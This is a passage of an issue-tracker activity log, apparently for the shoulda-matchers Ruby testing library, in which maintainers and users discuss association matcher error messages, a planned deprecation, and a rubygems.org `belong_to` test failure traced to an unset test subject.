If the `class_name` argument is changed to be incorrect there is a specific error message in the parentheses for the submatcher (`pub should resolve to Baz for class_name`), so I'm guessing that somehow the follow

[2020-11-06 17:41] mcmire commented on #1374
Dang, okay. These association matchers could use some better error handling so I'm not surprised. But thank you for the report!

[2020-11-08 07:52] mcmire commented on #1346
Yes! Wow sorry it took me so long to get back to you on this. I think this would be the perfect kind of thing to consider if we are thinking about 5.0.

[2020-11-08 08:11] mcmire commented on #1326
I'm going to close this since it's gone a bit stale, but I'm happy to reopen if you want to continue the discussion!

[2020-11-08 08:11] #1326 closed

[2020-11-08 17:00] VSPPedro commented on #1346
No problem! Should we add a deprecation warning to this first? And for the major release, we remove it.

[2020-11-09 05:30] sonalkr132 opened #1375 "should belong_to required_matcher uses invalid objects"
Hi, we are having a hard time updating to v4 as some of our `should belong_to` tests are failing. A few of them were legitimate failures and I have fixed them. However, there are others where failure seem avoidable to me. Consider the following relation and validation on Dependency model:

[code]
I am getting `Dependency should belong to version required: true` for `should belong_to :version`. As

[2020-11-09 16:29] mcmire commented on #1346
Ah. Yes. That would be a good idea. :)

[2020-11-09 16:47] mcmire commented on #1375
Hey @sonalkr132. So I don't see any factories being used in your test. You're just using `should belong_to(...)` straight away which means that by default the `subject` will be a blank Dependency object. If you're thrown off by the fact that `use_gem_dependency` is failing, I think that's okay — shoulda-matchers doesn't care about messages that appear on other attributes, only the one that you're

[2020-11-09 19:01] sonalkr132 commented on #1375
I am seeing the following in the failure message ([build link](https://travis-ci.org/github/rubygems/rubygems.org/jobs/742355602#L682)):
[code]
This seems a bit unexpected given that we are [using `belong_to :version`](https://github.com/rubygems/rubygems.org/blob/master/app/models/dependency.rb#L3)

I am not exactly familiar with how `should belong_to :version` is supposed to set up the subject.

[2020-11-09 20:58] mcmire commented on #1375
Okay, so I just tried pulling down your branch and running the tests myself. It seems that there are a couple of things happening here.

With regard to how `should belongs_to :version` sets up your subject, the answer is that it doesn't do a lot. The way that our matchers work in general, especially ones that involve testing validations, is that they're really only concerned with the attribute tha

[2020-11-10 06:01] sonalkr132 commented on #1375
Thank you for taking the time to debug this.

I guess this makes sense. I have set the subject on failing tests and it seems to be working. I agree these hooks are a bit wonky and we are depending/testing for the record being valid in a `before_validation` hook. Still interesting that no one else has tripped over this yet.

While I am here, allow me to bring this up https://github.com/rubygems/rub

[2020-11-10 06:01] #1375 closed

[2020-11-10 07:12] mcmire commented on #1375
@sonalkr132 Done!

[2020-11-11 20:07] #1345 closed

[2020-11-19 10:43] #1357 closed

[2020-11-19 10:47] VSPPedro commented on #1357
Hi, @kiskoza , thank you very much for all this information. The description of this issue helped me a lot.

This fix will be available on the next release.

Thank you!

Thank you again.

[2020-11-20 11:31] #1374 closed

[2020-11-20 11:33] VSPPedro commented on #1374
Hi, @orenyk , thank you very much for all this information. The description of this issue helped me a lot.

This fix will be available on the next release. It's already on the master.

Thanks again!